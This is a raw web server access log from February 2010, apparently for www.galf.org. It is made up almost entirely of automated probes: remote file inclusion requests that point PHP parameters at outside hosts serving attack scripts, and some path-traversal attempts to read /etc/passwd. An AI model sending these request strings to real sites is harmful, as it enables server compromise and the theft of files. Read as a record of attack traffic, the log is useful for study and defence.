89.36.175.10 - - [07/Feb/2010:19:17:07 -0800] "GET /logs/access_090921.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://ios.co.kr/files_income/income/id1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.146.84 - - [07/Feb/2010:19:19:31 -0800] "GET /logs/access.log//download.php?board_skin_path=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
65.55.207.121 - - [07/Feb/2010:19:29:25 -0800] "GET /?N=D HTTP/1.1" 200 1048 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
89.36.175.10 - - [07/Feb/2010:19:29:42 -0800] "GET /include/admin.lib.inc.php?site_path=http://ios.co.kr/files_income/income/id1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.36.175.10 - - [07/Feb/2010:19:29:42 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://ios.co.kr/files_income/income/id1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.36.175.10 - - [07/Feb/2010:19:29:42 -0800] "GET /logs/access_090720.log//include/admin.lib.inc.php?site_path=http://ios.co.kr/files_income/income/id1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.249.65.86 - - [07/Feb/2010:19:30:43 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.galf.org"
220.73.144.196 - - [07/Feb/2010:19:31:23 -0800] "GET /logs/access_090720.log////delete_all.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [07/Feb/2010:19:31:23 -0800] "GET ///delete_all.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [07/Feb/2010:19:31:23 -0800] "GET /logs////delete_all.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.36.175.10 - - [07/Feb/2010:19:31:49 -0800] "GET /logs/access_090720.log%20%20//include/admin.lib.inc.php?site_path=http://ios.co.kr/files_income/income/id1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [07/Feb/2010:19:32:27 -0800] "GET /logs/access.log%20%20//bbs//delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [07/Feb/2010:19:32:27 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [07/Feb/2010:19:32:27 -0800] "GET /bbs//delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [07/Feb/2010:19:32:42 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [07/Feb/2010:19:32:42 -0800] "GET /logs/access.log%20%20//bbs//delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [07/Feb/2010:19:32:42 -0800] "GET /bbs//delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [07/Feb/2010:19:32:47 -0800] "GET /bbs//delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [07/Feb/2010:19:32:47 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [07/Feb/2010:19:32:47 -0800] "GET /logs/access.log%20%20//bbs//delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.207.69 - - [07/Feb/2010:19:33:05 -0800] "GET /?N=A HTTP/1.1" 200 1048 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
210.116.103.118 - - [07/Feb/2010:19:34:05 -0800] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://eguruji.net/modlogan/daily_usage_200904.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.116.103.118 - - [07/Feb/2010:19:34:06 -0800] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://eguruji.net/modlogan/daily_usage_200904.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.116.103.118 - - [07/Feb/2010:19:34:08 -0800] "GET /logs/access_090713.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://eguruji.net/modlogan/daily_usage_200904.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.33.199.19 - - [07/Feb/2010:19:34:27 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
210.116.103.118 - - [07/Feb/2010:19:35:04 -0800] "GET /logs/access_090713.log%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://eguruji.net/modlogan/daily_usage_200904.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.116.103.118 - - [07/Feb/2010:19:35:25 -0800] "GET /logs/access_091130.log%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://eguruji.net/modlogan/daily_usage_200904.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.33.199.19 - - [07/Feb/2010:19:36:39 -0800] "GET /logs/access_090713.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
84.33.199.19 - - [07/Feb/2010:19:36:39 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
84.33.199.19 - - [07/Feb/2010:19:36:39 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
211.192.139.164 - - [07/Feb/2010:19:37:11 -0800] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.192.139.164 - - [07/Feb/2010:19:37:11 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
211.192.139.164 - - [07/Feb/2010:19:37:12 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
211.192.139.164 - - [07/Feb/2010:19:37:21 -0800] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.192.139.164 - - [07/Feb/2010:19:37:21 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://sisi123.fileave.com/id1.txt??? HTTP/1.0" 200 1032 "-" "Mozilla/5.0" "www.galf.org"
211.192.139.164 - - [07/Feb/2010:19:37:21 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
210.116.103.118 - - [07/Feb/2010:19:39:57 -0800] "GET /logs/access_090817.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://eguruji.net/modlogan/daily_usage_200904.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [07/Feb/2010:19:41:33 -0800] "GET /logs/access.log%20%20//bbs//delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [07/Feb/2010:19:41:33 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [07/Feb/2010:19:41:33 -0800] "GET /bbs//delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [07/Feb/2010:19:41:35 -0800] "GET /bbs//delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [07/Feb/2010:19:41:35 -0800] "GET /logs/access.log%20%20//bbs//delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [07/Feb/2010:19:41:35 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [07/Feb/2010:19:41:44 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [07/Feb/2010:19:41:44 -0800] "GET /logs/access.log%20%20//bbs//delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [07/Feb/2010:19:41:44 -0800] "GET /bbs//delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.33.199.19 - - [07/Feb/2010:19:45:25 -0800] "GET /logs/access_090914.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
222.103.87.96 - - [07/Feb/2010:19:46:26 -0800] "GET /logs/access.log/bbs/write_update.php?board_skin_path=http://www.nanumsoft.com/gnuboard4/data/session/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.103.87.96 - - [07/Feb/2010:19:46:26 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.nanumsoft.com/gnuboard4/data/session/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.103.87.96 - - [07/Feb/2010:19:46:26 -0800] "GET /logs/bbs/write_update.php?board_skin_path=http://www.nanumsoft.com/gnuboard4/data/session/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.103.87.96 - - [07/Feb/2010:19:46:26 -0800] "GET /logs/access_100201.log/bbs/write_update.php?board_skin_path=http://www.nanumsoft.com/gnuboard4/data/session/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [07/Feb/2010:19:50:33 -0800] "GET //delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [07/Feb/2010:19:50:33 -0800] "GET /logs/access.log///delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [07/Feb/2010:19:50:34 -0800] "GET /logs///delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
109.123.78.44 - - [07/Feb/2010:19:50:40 -0800] "GET /logs/access.log/bbs/write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
109.123.78.44 - - [07/Feb/2010:19:50:41 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
109.123.78.44 - - [07/Feb/2010:19:50:41 -0800] "GET /logs/bbs/write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
210.205.6.233 - - [07/Feb/2010:19:51:04 -0800] "GET //delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [07/Feb/2010:19:51:04 -0800] "GET /logs/access.log///delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [07/Feb/2010:19:51:04 -0800] "GET /logs///delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [07/Feb/2010:19:51:08 -0800] "GET /logs/access_100201.log///delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [07/Feb/2010:19:51:36 -0800] "GET /logs/access.log////write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [07/Feb/2010:19:51:36 -0800] "GET /logs////write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [07/Feb/2010:19:51:36 -0800] "GET ///write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [07/Feb/2010:19:51:48 -0800] "GET /logs/access_100201.log////write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [07/Feb/2010:19:51:57 -0800] "GET /logs/access_100201.log///delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [07/Feb/2010:19:51:57 -0800] "GET ///write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [07/Feb/2010:19:51:57 -0800] "GET /logs////write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [07/Feb/2010:19:51:57 -0800] "GET /logs/access.log////write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [07/Feb/2010:19:52:11 -0800] "GET /logs/access_100201.log////write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
109.123.78.44 - - [07/Feb/2010:19:53:38 -0800] "GET /logs/access_100201.log/bbs/write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
121.88.4.74 - - [07/Feb/2010:19:53:43 -0800] "GET /bbs/delete_comment.php?board_skin_path=http://www.nanumsoft.com/gnuboard4/data/session/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.74 - - [07/Feb/2010:19:53:44 -0800] "GET /logs/bbs/delete_comment.php?board_skin_path=http://www.nanumsoft.com/gnuboard4/data/session/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.74 - - [07/Feb/2010:19:53:44 -0800] "GET /logs/access_100201.log/bbs/delete_comment.php?board_skin_path=http://www.nanumsoft.com/gnuboard4/data/session/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.74 - - [07/Feb/2010:19:53:44 -0800] "GET /logs/access.log/bbs/delete_comment.php?board_skin_path=http://www.nanumsoft.com/gnuboard4/data/session/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.3.136 - - [07/Feb/2010:19:54:36 -0800] "GET /bbs//delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.3.136 - - [07/Feb/2010:19:54:37 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.3.136 - - [07/Feb/2010:19:54:38 -0800] "GET /logs/access.log//bbs//delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.3.136 - - [07/Feb/2010:19:55:24 -0800] "GET /logs/access_100201.log//bbs//delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [07/Feb/2010:19:57:23 -0800] "GET /logs/access_100201.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [07/Feb/2010:19:57:23 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [07/Feb/2010:19:57:23 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [07/Feb/2010:19:57:28 -0800] "GET /logs/access.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.46.199.182 - - [07/Feb/2010:19:58:21 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
220.73.144.196 - - [07/Feb/2010:20:00:23 -0800] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [07/Feb/2010:20:00:23 -0800] "GET /logs/access_091116.log%20%20////components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [07/Feb/2010:20:00:23 -0800] "GET /logs////components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [07/Feb/2010:20:00:24 -0800] "GET /logs////components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [07/Feb/2010:20:00:24 -0800] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [07/Feb/2010:20:00:24 -0800] "GET /logs/access_091116.log%20%20////components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [07/Feb/2010:20:01:08 -0800] "GET /logs/access_090803.log%20%20////components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [07/Feb/2010:20:01:09 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [07/Feb/2010:20:01:09 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [07/Feb/2010:20:01:09 -0800] "GET /logs/access_100201.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [07/Feb/2010:20:01:11 -0800] "GET /logs/access.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [07/Feb/2010:20:01:59 -0800] "GET /logs/access_090803.log%20%20////components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:20:05:22 -0800] "GET /logs/access.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:20:05:27 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 200 4951 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:20:05:37 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 200 1051 "-" "Mozilla/5.0" "www.galf.org"
87.250.252.242 - - [07/Feb/2010:20:06:22 -0800] "GET /logs/access_090921.log HTTP/1.1" 200 5427548 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:20:07:07 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 200 1051 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:20:07:07 -0800] "GET /logs/access.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:20:07:07 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 200 4951 "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [07/Feb/2010:20:08:30 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [07/Feb/2010:20:08:30 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [07/Feb/2010:20:08:30 -0800] "GET /logs/access_090720.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [07/Feb/2010:20:08:40 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [07/Feb/2010:20:08:40 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [07/Feb/2010:20:08:40 -0800] "GET /logs/access_090720.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [07/Feb/2010:20:09:13 -0800] "GET /logs/access_100201.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [07/Feb/2010:20:09:14 -0800] "GET /logs/access.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.149.110.210 - - [07/Feb/2010:20:09:53 -0800] "GET /logs/poll_update.php?board_skin_path=http://www.nanumsoft.com/gnuboard4/data/session/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.149.110.210 - - [07/Feb/2010:20:09:53 -0800] "GET /logs/access.log%20%20/poll_update.php?board_skin_path=http://www.nanumsoft.com/gnuboard4/data/session/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.149.110.210 - - [07/Feb/2010:20:09:53 -0800] "GET /poll_update.php?board_skin_path=http://www.nanumsoft.com/gnuboard4/data/session/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.149.110.210 - - [07/Feb/2010:20:10:01 -0800] "GET /logs/access_100201.log%20%20/poll_update.php?board_skin_path=http://www.nanumsoft.com/gnuboard4/data/session/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:20:10:22 -0800] "GET /logs/access_100201.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [07/Feb/2010:20:10:37 -0800] "GET /logs/access_100201.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [07/Feb/2010:20:10:37 -0800] "GET /logs/access.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
